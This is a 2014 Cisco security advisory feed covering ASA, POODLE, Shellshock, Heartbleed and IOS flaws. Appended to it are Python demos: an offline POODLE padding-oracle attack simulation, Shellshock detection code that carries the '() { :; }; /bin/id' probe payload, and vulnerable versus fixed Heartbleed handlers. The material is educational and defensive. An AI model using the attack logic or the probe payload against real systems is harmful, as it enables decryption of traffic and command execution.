Cisco Security Advisory (RSS feed: http://tools.cisco.com/security/center/psirtrss20/CiscoSecurityAdvisory.xml, en-us). 1992-2010 Cisco Systems, Inc. All rights reserved. Security Advisories, Cisco Systems, Inc.

Multiple Vulnerabilities in Cisco ASA Software
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa
Cisco Adaptive Security Appliance (ASA) Software is affected by the following vulnerabilities:
<ul>
<li>Cisco ASA SQL*NET Inspection Engine Denial of Service Vulnerability</li>
<li>Cisco ASA VPN Denial of Service Vulnerability</li>
<li>Cisco ASA IKEv2 Denial of Service Vulnerability</li>
<li>Cisco ASA Health and Performance Monitor Denial of Service Vulnerability</li>
<li>Cisco ASA GPRS Tunneling Protocol Inspection Engine Denial of Service Vulnerability</li>
<li>Cisco ASA SunRPC Inspection Engine Denial of Service Vulnerability</li>
<li>Cisco ASA DNS Inspection Engine Denial of Service Vulnerability</li>
<li>Cisco ASA VPN Failover Command Injection Vulnerability</li>
<li>Cisco ASA VNMC Command Input Validation Vulnerability</li>
<li>Cisco ASA Local Path Inclusion Vulnerability</li>
<li>Cisco ASA Clientless SSL VPN Information Disclosure and Denial of Service Vulnerability</li>
<li>Cisco ASA Clientless SSL VPN Portal Customization Integrity Vulnerability</li>
<li>Cisco ASA Smart Call Home Digital Certificate Validation Vulnerability</li>
</ul>
These vulnerabilities are independent of one another; a release that is affected by one of the vulnerabilities may not be affected by the others.<br /> <br /> Successful exploitation of the Cisco ASA SQL*NET Inspection Engine Denial of Service Vulnerability, Cisco ASA VPN Denial of Service Vulnerability, Cisco ASA IKEv2 Denial of Service Vulnerability, Cisco ASA Health and Performance Monitor Denial of Service Vulnerability, Cisco ASA GPRS Tunneling Protocol Inspection Engine Denial of Service Vulnerability, Cisco ASA SunRPC Inspection Engine Denial of Service Vulnerability, and Cisco ASA DNS Inspection Engine Denial of Service Vulnerability may result in a reload of an affected device, leading to a denial of service (DoS) condition.<br /> <br /> Successful exploitation of the Cisco ASA VPN Failover Command Injection Vulnerability, Cisco ASA VNMC Command Input Validation Vulnerability, and Cisco ASA Local Path Inclusion Vulnerability may result in full compromise of the affected system.<br /> <br /> Successful exploitation of the Cisco ASA Clientless SSL VPN Information Disclosure and Denial of Service Vulnerability may result in the disclosure of internal information or, in some cases, a reload of the affected system.<br /> <br /> Successful exploitation of the Cisco ASA Clientless SSL VPN Portal Customization Integrity Vulnerability may result in a compromise of the Clientless SSL VPN portal, which may lead to several types of attacks, including but not limited to cross-site scripting (XSS), theft of credentials, or redirection of users to malicious web pages.<br /> <br /> Successful exploitation of the Cisco ASA Smart Call Home Digital Certificate Validation Vulnerability may result in a digital certificate validation bypass, which could allow the attacker to bypass digital certificate authentication and gain access inside the network via remote access VPN, or management access to the affected system via Cisco Adaptive Security Device Manager (ASDM).<br /> <br /> Cisco has released free software updates that address these vulnerabilities.
Workarounds that mitigate some of these vulnerabilities are available.<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa</a>
Fri, 24 Oct 2014 15:44:11 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa

SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle
On October 14, 2014, a vulnerability was publicly announced in the Secure Sockets Layer version 3 (SSLv3) protocol when using a block cipher in Cipher Block Chaining (CBC) mode. SSLv3 is a cryptographic protocol designed to provide communication security; it has been superseded by the Transport Layer Security (TLS) protocols. By exploiting this vulnerability, an attacker could decrypt a subset of the encrypted communication. The attack uses the receiver's acceptance or rejection of a modified record as a padding oracle and needs on average 256 attempts per recovered byte, so it targets data that is repeated across many connections, such as HTTP cookies, and requires the attacker to both observe the traffic and trigger the repeated requests.<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle</a>
Fri, 24 Oct 2014 01:12:58 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle

TCP Vulnerabilities in Multiple Non-IOS Cisco Products
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios
<p> A vulnerability in the Transmission Control Protocol (TCP) specification (RFC 793) has been discovered by an external researcher. Successful exploitation enables an adversary to reset any established TCP connection in a much shorter time than was previously discussed publicly: because a RST segment is accepted when its sequence number falls anywhere inside the receiver's window rather than only when it matches the next expected sequence number exactly, the number of spoofed segments needed is roughly 2^32 divided by the window size instead of 2^32. Depending on the application, the connection may be re-established automatically. In other cases, a user will have to repeat the action (for example, open a new Telnet or SSH session). Depending upon the attacked protocol, a successful attack may have additional consequences beyond the terminated connection, which must be considered. This attack vector applies only to sessions that terminate on a device (such as a router, switch, or computer), and not to sessions that merely pass through the device (for example, transit traffic that is being routed by a router).
In addition, the attack vector does not directly compromise data integrity or confidentiality. </p> <p> All Cisco products which contain a TCP stack are susceptible to this vulnerability. </p> <p> This advisory is available at <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios</a>, and it describes this vulnerability as it applies to Cisco products that do not run Cisco IOS&reg; Software. </p> <p> A companion advisory that describes this vulnerability for products that run Cisco IOS Software is available at <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-ios">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-ios</a>. </p>
Thu, 23 Oct 2014 12:53:51 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios

GNU Bash Environment Variable Command Injection Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
<p>On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed through environment variables: an affected Bash keeps parsing past the end of an exported function definition, so shell commands appended to the function body in the variable's value are executed when the shell starts. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.</p> All versions of GNU Bash starting with version 1.14 are affected by this vulnerability, and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, authentication is required before exploitation could be attempted.<br /> <br /> A number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is a third-party software component that is part of the GNU software project and is used by a number of software vendors. As of this version of the Security Advisory, a number of vulnerabilities have recently been discovered in the Bash shell, and the investigation is ongoing. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by it. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a>
Wed, 22 Oct 2014 16:18:33 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash

Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport
Cisco AsyncOS Software for Cisco Web Security Appliance (WSA), Cisco Email Security Appliance (ESA), and Cisco Content Security Management Appliance (SMA) contains a vulnerability that may allow a remote, unauthenticated attacker to execute arbitrary code with elevated privileges. <br /> <br /> Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available.
<br /> <br /> <strong>Note:</strong> This security advisory has been updated to include important information about Cisco WSA.<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport</a>
Thu, 16 Oct 2014 13:40:20 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport

Cisco TelePresence MCU Software Memory Exhaustion Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu
A vulnerability in the network stack of Cisco TelePresence MCU Software could allow an unauthenticated, remote attacker to exhaust available memory, which could lead to system instability and a reload of the affected system.<br /> <br /> Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu</a><br /> <br /> <strong>Note:</strong>&nbsp;This security advisory does not provide information about the GNU Bash Environment Variable Command Injection Vulnerability (also known as <em>Shellshock</em>). For additional information regarding Cisco products affected by that vulnerability, refer to the Cisco Security Advisory at the following link: <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a>
Wed, 15 Oct 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu

Multiple Vulnerabilities in Cisco TelePresence Video Communication Server and Cisco Expressway Software
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs
Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Software include the following vulnerabilities:<br />
<ul>
<li>Cisco TelePresence VCS and Cisco Expressway Crafted Packets Denial of Service Vulnerability</li>
<li>Cisco TelePresence VCS and Cisco Expressway SIP IX Filter Denial of Service Vulnerability</li>
<li>Cisco TelePresence VCS and Cisco Expressway SIP Denial of Service Vulnerability</li>
</ul>
Successful exploitation of any of these vulnerabilities could allow an unauthenticated, remote attacker to cause a reload of the affected system, which may result in a denial of service (DoS) condition.<br /> <br /> Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available.
This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs</a><br /> <br /> <strong>Note:</strong>&nbsp;This security advisory does not provide information about the GNU Bash Environment Variable Command Injection Vulnerability (also known as <em>Shellshock</em>). For additional information regarding Cisco products affected by that vulnerability, refer to the Cisco Security Advisory at the following link: <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a>
Wed, 15 Oct 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs

Multiple Vulnerabilities in Cisco Unified Communications Domain Manager
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm
Cisco Unified Communications Domain Manager (Cisco Unified CDM) is affected by the following vulnerabilities:<br />
<ul>
<li>Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability</li>
<li>Cisco Unified Communications Domain Manager Default SSH Key Vulnerability</li>
<li>Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability</li>
</ul>
<p>Successful exploitation of the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability or of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability may allow an attacker to execute arbitrary commands or obtain privileged access to the affected system.</p> Successful exploitation of the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may allow an attacker to access and modify BVSMWeb portal user information, such as settings in the personal phone directory, speed dials, Single Number Reach, and call forward settings.<br /> <br /> Cisco has released free software updates that address the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability and the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability. <br /> Cisco will provide a free software update for the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability as soon as the fix is available.<br /> <br /> Workarounds that mitigate these vulnerabilities are not available.&nbsp;Customers who are concerned about the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may apply the mitigation detailed in the "Workarounds" section of this advisory. <br /> <br /> <strong>Note:</strong> Due to an error in the fix for the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability, all Cisco Unified CDM Platform Software releases are vulnerable, regardless of whether a previous patch from this security advisory has been applied. This advisory has been updated to provide additional information about the fix for the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability.<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm</a>
Mon, 13 Oct 2014 15:55:13 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm

OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed
Multiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of up to 64 kilobytes from a connected client or server.<br /> <br /> The vulnerability is due to a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension: the peer's claimed payload length is trusted and that many bytes are copied into the response, even when the received message is shorter. An attacker could exploit this vulnerability by implementing a malicious TLS or Datagram Transport Layer Security (DTLS) client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. An exploit could send a specially crafted TLS or DTLS heartbeat packet to the connected client or server.
An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.<br /> <br /> Note that the devices affected by this vulnerability are those acting as an SSL server terminating SSL connections or as an SSL client initiating an SSL connection. Devices that are simply traversed by SSL traffic without terminating it are not affected. <br /> <br /> This advisory will be updated as additional information becomes available. Cisco will release free software updates that address this vulnerability. Workarounds that mitigate this vulnerability may be available. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed</a>
Thu, 09 Oct 2014 20:16:45 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed

Cisco IOS Software RSVP Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp
A vulnerability in the implementation of the Resource Reservation Protocol (RSVP) in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload.
This vulnerability could be exploited repeatedly to cause an extended denial of service (DoS) condition.<br /> <br /> Cisco has released free software updates that address this vulnerability.<br /> <br /> A workaround that mitigates this vulnerability is available.<br /> <br /> This advisory is available at the following link: <br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp</a><br /> <br /> <strong>Note:</strong> The September 24, 2014, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. All advisories address vulnerabilities in Cisco IOS Software. Individual publication links are in <em>Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication</em> at the following link: <p><a href="http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html">http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html</a></p>
Fri, 26 Sep 2014 19:15:33 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp

Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6
A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.<br /> <br /> The vulnerability is due to improper parsing of malformed DHCPv6 packets. An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and the eventual reload of an affected device.<br /> <br /> Cisco has released free software updates that address this vulnerability. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6</a><br /> <br /> <strong>Note:</strong> The September 24, 2014, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. All advisories address vulnerabilities in Cisco IOS Software. Individual publication links are in <em>Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication</em> at the following link: <p><a href="http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html">http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html</a></p>
Wed, 24 Sep 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6

Multiple Vulnerabilities in Cisco IOS Software Multicast Domain Name System
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns
The Cisco IOS Software implementation of the multicast Domain Name System (mDNS) feature contains the following vulnerabilities when processing mDNS packets, either of which could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition:
<ul>
<li>Cisco IOS Software mDNS Gateway Memory Leak Vulnerability</li>
<li>Cisco IOS Software mDNS Gateway Denial of Service Vulnerability</li>
</ul>
Cisco has released free software updates that address these vulnerabilities. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns</a><br /> <br /> <strong>Note:</strong> The September 24, 2014, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. All advisories address vulnerabilities in Cisco IOS Software. Individual publication links are in <em>Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication</em> at the following link: <p><a href="http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html">http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html</a></p>
Wed, 24 Sep 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns
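Worked example for the POODLE advisory (cisco-sa-20141015-poodle) listed above. This is an added simulation, not Cisco's code and not taken from the advisory. It models the SSLv3 record layer (MAC, then pad, then CBC-encrypt) with two stand-ins chosen so that the block runs offline: a small SHA-256-based Feistel network in place of the real block cipher, and HMAC-SHA1 in place of the SSLv3 record MAC. The weakness shown does not depend on those choices. SSLv3 checks only the last padding byte, so when the attacker copies the ciphertext block that holds a target byte into the position of the all-padding final block, the receiver accepts the record exactly when that block's last byte decrypts to BLOCK - 1; each acceptance leaks one plaintext byte, at about 256 attempts per byte. The secret, the request layout and the keys are constructed for the example; the attacker sees ciphertext and the accept/reject decision only.

```python
"""Simulation of the POODLE padding-oracle attack against SSLv3-style CBC records."""
import hashlib
import hmac
import os

BLOCK = 16     # block size of the stand-in cipher, same as AES
MAC_LEN = 20   # HMAC-SHA1 digest length, standing in for the SSLv3 record MAC


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, i, half):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, blk):
    # 4-round Feistel network over 16-byte blocks (toy cipher; any block cipher would do)
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)


def sslv3_seal(enc_key, mac_key, plaintext):
    """MAC, then pad, then CBC-encrypt, as the SSLv3 record layer does.
    SSLv3 padding is pad_len arbitrary bytes followed by the pad_len byte itself.
    A fresh random IV per record is used here for simplicity; returns iv || ciphertext."""
    mac = hmac.new(mac_key, plaintext, hashlib.sha1).digest()
    pad_len = (BLOCK - (len(plaintext) + MAC_LEN + 1) % BLOCK) % BLOCK
    padding = os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(enc_key, iv, plaintext + mac + padding)


def sslv3_open(enc_key, mac_key, record):
    """The receiver, and therefore the oracle: True if the record is accepted.
    Only the final byte (the padding length) is validated, as in SSLv3; the
    padding bytes before it are never inspected."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    if not ct or len(ct) % BLOCK:
        return False
    pt = cbc_decrypt(enc_key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK or len(pt) < pad_len + 1 + MAC_LEN:
        return False
    body = pt[:len(pt) - pad_len - 1]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest())


def poodle_recover(secret_len, send, accept, max_tries=20000):
    """Recover a secret that the victim includes in every record it sends.

    send(prefix_len, suffix_len): victim encrypts prefix + secret + suffix and
    returns the record (the attacker controls the layout, e.g. URL path length)
    accept(record): the receiver's accept/reject decision (the oracle)
    """
    recovered = bytearray()
    for j in range(secret_len):
        # Put secret[j] in the last byte of plaintext block `blk`, and size the
        # suffix so that the record ends with a block that is entirely padding.
        prefix_len = (BLOCK - 1 - j) % BLOCK
        suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK
        blk = (prefix_len + j) // BLOCK
        for _ in range(max_tries):
            rec = send(prefix_len, suffix_len)
            c = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # c[0] is the IV
            # Replace the padding block with the ciphertext block that holds the target.
            forged = b"".join(c[:-1]) + c[blk + 1]
            if accept(forged):
                # Accepted means D(c[blk+1]) ^ c[-2] ends in BLOCK-1, and
                # D(c[blk+1]) = P[blk] ^ c[blk], so the target byte follows directly.
                recovered.append((BLOCK - 1) ^ c[blk][-1] ^ c[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check the block alignment")
    return bytes(recovered)


def demo(secret=b"sid=4f2a"):
    """Keys and secret stay on the victim side; the attacker gets only records
    and accept/reject decisions. Returns the recovered secret."""
    enc_key, mac_key = os.urandom(16), os.urandom(16)

    def victim_send(prefix_len, suffix_len):
        return sslv3_seal(enc_key, mac_key, b"A" * prefix_len + secret + b"B" * suffix_len)

    def receiver_accept(record):
        return sslv3_open(enc_key, mac_key, record)

    return poodle_recover(len(secret), victim_send, receiver_accept)


if __name__ == "__main__":
    print(demo())
```

In a real deployment, `send` is the victim's browser issuing repeated requests at the attacker's prompting and `accept` is observing whether the server answers or tears the connection down; the attacker must also sit on the path to swap the blocks. Because the padding-length check is all SSLv3 gives the receiver, no server-side fix short of abandoning SSLv3 (or at least its CBC cipher suites) removes the oracle, which is why the response to this advisory is to disable SSLv3 and prevent the downgrade that "Downgraded Legacy Encryption" refers to.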
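Worked example for the GNU Bash advisory (cisco-sa-20140926-bash) listed above, covering the "scripts hosted on web servers" invocation path. This is added code, not Cisco's and not from the advisory. It shows how a CGI gateway turns request headers an unauthenticated client controls into environment variables (the RFC 3875 naming rule, which is standard), a check a gateway can apply before spawning a child so that a value carrying the Bash function-export prefix never reaches the shell, and a scan of access-log lines for the same prefix. The headers and log lines are constructed for the example; the check is a stop-gap for the gateway and does not replace patching Bash.

```python
"""Shellshock exposure through CGI: header-to-environment mapping, a pre-spawn
gate, and retrospective log scanning."""
import re

# An unpatched Bash treated any environment variable whose value began with
# "() {" as an exported function and kept parsing past the closing brace, so a
# value such as "() { :; }; /bin/id" ran /bin/id as the shell started.
FUNCTION_EXPORT_RE = re.compile(r"^\s*\(\)\s*\{")


def cgi_environ(headers, base_env=None):
    """Map HTTP request headers to CGI meta-variables as RFC 3875 specifies:
    HTTP_ plus the upper-cased name with '-' replaced by '_', except for
    Content-Type and Content-Length, which are passed without the prefix.
    This is the path by which a remote client's bytes reach a CGI script's
    environment before Bash is even invoked."""
    env = dict(base_env or {})
    for name, value in headers:
        key = name.upper().replace("-", "_")
        if key not in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            key = "HTTP_" + key
        env[key] = value
    return env


def suspicious_vars(env):
    """Names of environment variables whose value carries the function-export prefix."""
    return sorted(k for k, v in env.items() if FUNCTION_EXPORT_RE.match(v))


def trailing_command(value):
    """Triage helper: the text after the function body, i.e. what an unpatched
    Bash would have executed. Empty string if the value is not an export."""
    m = re.match(r"^\s*\(\)\s*\{.*?\}\s*;?\s*(.*)$", value, re.S)
    return m.group(1).strip() if m else ""


def safe_environ(headers, base_env=None):
    """Gate to place in front of subprocess creation: refuse to start a child
    with an environment that could trigger the bug."""
    env = cgi_environ(headers, base_env)
    bad = suspicious_vars(env)
    if bad:
        raise ValueError("refusing to spawn: function-export prefix in " + ", ".join(bad))
    return env


def scan_access_log(lines):
    """Source addresses of combined-format log lines whose quoted fields
    (request line, referer, user-agent) carry the prefix."""
    hits = []
    for line in lines:
        quoted = re.findall(r'"([^"]*)"', line)
        if any(FUNCTION_EXPORT_RE.match(f) for f in quoted):
            hits.append(line.split(" ", 1)[0])
    return hits


if __name__ == "__main__":
    # Constructed request: the User-Agent is the classic probe payload.
    probe = [("Host", "example.test"), ("User-Agent", "() { :; }; /bin/id")]
    env = cgi_environ(probe)
    print("suspicious:", suspicious_vars(env))
    print("would run:", trailing_command(env["HTTP_USER_AGENT"]))
```

The gate rejects on the prefix alone rather than on a list of known payloads, because the shell treats anything after the function body as commands and the attacker chooses that text freely. A server that runs CGI or other Bash-backed handlers should still apply the vendor update; the gate only closes the HTTP path, and the advisory lists telnet, SSH and DHCP as further ways into the shell's environment.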
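Worked example for the OpenSSL heartbeat advisory (cisco-sa-20140409-heartbleed) listed above. This is added code, not Cisco's or OpenSSL's. It parses the heartbeat message layout from RFC 6520 (type, 16-bit payload_length, payload, at least 16 bytes of padding) with two handlers: one that trusts payload_length the way the affected OpenSSL did, and one with the bounds check that the fix added, which discards any message whose claimed payload does not fit inside the record actually received. Process memory adjacent to the record is simulated with a constructed byte string; in the real bug the copy simply runs off the end of the record into whatever the heap held.

```python
"""TLS heartbeat (RFC 6520) handling: the missing bounds check and its fix."""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING_LEN = 16   # RFC 6520: at least 16 bytes of padding follow the payload


def build_heartbeat(payload, claimed_len=None):
    """HeartbeatMessage = type(1) || payload_length(2) || payload || padding.
    An honest peer sets claimed_len == len(payload); the attack sets it larger."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING_LEN


def handle_heartbeat_vulnerable(record, adjacent_memory):
    """Trusts payload_length and copies that many bytes starting at the payload,
    with no comparison against the length of the record that arrived.
    `adjacent_memory` stands in for whatever followed the record on the heap."""
    hb_type, payload_len = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    heap = record + adjacent_memory
    echoed = heap[3:3 + payload_len]            # reads past the record when payload_len lies
    return struct.pack("!BH", HB_RESPONSE, len(echoed)) + echoed + b"\x00" * PADDING_LEN


def handle_heartbeat_fixed(record, adjacent_memory):
    """The bounds check the fix added: header + claimed payload + padding must
    fit inside the received record, otherwise the message is silently dropped."""
    if len(record) < 1 + 2 + PADDING_LEN:
        return None                              # too short to even carry the padding
    hb_type, payload_len = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING_LEN > len(record):
        return None
    echoed = record[3:3 + payload_len]
    return struct.pack("!BH", HB_RESPONSE, len(echoed)) + echoed + b"\x00" * PADDING_LEN


def response_payload(response):
    """Payload the requester gets back. With the vulnerable handler this can be
    up to 65535 bytes, the limit of the 16-bit length field, which is the
    '64 kilobytes' per heartbeat that the advisory describes."""
    if response is None:
        return None
    payload_len = struct.unpack("!H", response[1:3])[0]
    return response[3:3 + payload_len]


def demo():
    """Constructed heap contents standing in for a server's private material."""
    heap = b"\x00" * 40 + b"-----BEGIN RSA PRIVATE KEY-----\nMIIEow..." + b"\x00" * 400
    honest = build_heartbeat(b"ping")
    lying = build_heartbeat(b"ping", claimed_len=300)
    return {
        "vulnerable_honest": response_payload(handle_heartbeat_vulnerable(honest, heap)),
        "vulnerable_lying": response_payload(handle_heartbeat_vulnerable(lying, heap)),
        "fixed_honest": response_payload(handle_heartbeat_fixed(honest, heap)),
        "fixed_lying": response_payload(handle_heartbeat_fixed(lying, heap)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, None if value is None else value[:48])
```

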